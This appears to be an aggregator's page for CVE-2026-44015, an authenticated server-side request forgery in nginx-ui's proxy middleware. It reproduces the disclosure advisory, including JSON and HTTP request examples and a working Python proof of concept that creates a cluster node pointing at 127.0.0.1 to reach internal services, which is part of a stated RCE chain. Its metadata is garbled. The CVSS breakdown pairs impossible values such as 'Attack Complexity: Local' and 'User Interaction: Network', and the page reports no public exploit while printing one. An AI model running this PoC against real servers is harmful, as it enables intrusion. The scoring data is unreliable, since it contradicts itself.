What is the severity of CVE-2026-44015?

CVE-2026-44015 has a CVSS v3 score of 9.9, which is classified as Critical severity.

Is there an exploit available for CVE-2026-44015?

No known public exploits are currently available for CVE-2026-44015.

Is there a patch available for CVE-2026-44015?

Yes, patches are available for CVE-2026-44015. Check the vendor advisories for update instructions.

CVE-2026-44015 - CVE Details, Severity, and Analysis

Severity Scores

CVSS v39.9

CVSS v20.0

Priority Score714.0

EPSS Score0.0

Critical

Exploitation LikelihoodMinimal

0.00%EPSS

Very low probability of exploitation

Monitor and patch as resources allow

0.00%

EPSS

9.9

CVSS

No

Exploit

Yes

Patch

Medium Priority

critical severity

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

An authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the X-Node-ID header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.

Details

The nginx-ui Proxy middleware (internal/middleware/proxy.go) intercepts API requests containing an X-Node-ID header and forwards them to the URL of the corresponding cluster node. An attacker can:

Read the node_secret from GET /api/settings (accessible to any authenticated user)
Create a cluster node via POST /api/nodes pointing to any internal URL:

{
    "name": "ssrf_node",
    "url": "http://127.0.0.1:51820",
    "token": "<node_secret>",
    "enabled": true
}

Send any API request with the X-Node-ID header set to the created node's ID:

GET /api/settings HTTP/1.1
Authorization: <token>
X-Node-ID: 1

The Proxy middleware forwards this request to http://127.0.0.1:51820/api/settings, making a server-side request to the internal address.

Vulnerable code path:

internal/middleware/proxy.go — Proxy(): no validation of the node URL; allows 127.0.0.1, localhost, internal IPs, cloud metadata endpoints, etc.

The node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.

PoC

import requests

BASE = "http://TARGET:9000"
TOKEN = "<authenticated_jwt_token>"
HDR = {"Authorization": TOKEN}

# Step 1: Get node_secret
settings = requests.get(f"{BASE}/api/settings", headers=HDR).json()
node_secret = settings["node"]["secret"]

# Step 2: Create SSRF node pointing to internal service
resp = requests.post(f"{BASE}/api/nodes", headers=HDR, json={
    "name": "ssrf",
    "url": "http://127.0.0.1:51820",  # internal-only port
    "token": node_secret,
    "enabled": True,
})
node_id = resp.json()["id"]

# Step 3: SSRF — request is forwarded to http://127.0.0.1:51820/api/settings
resp = requests.get(
    f"{BASE}/api/settings",
    headers={**HDR, "X-Node-ID": str(node_id)},
)
print(resp.status_code, resp.text[:200])
# Response comes from the INTERNAL service, not nginx-ui

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Local

User Interaction:Network

Scope:Changed

Confidentiality:High

Integrity:High

Availability:High

Patch References

Security [email protected]

Ready for Agentic Automated Testing?

CVE-2026-44015

Summary

Details

PoC

Impact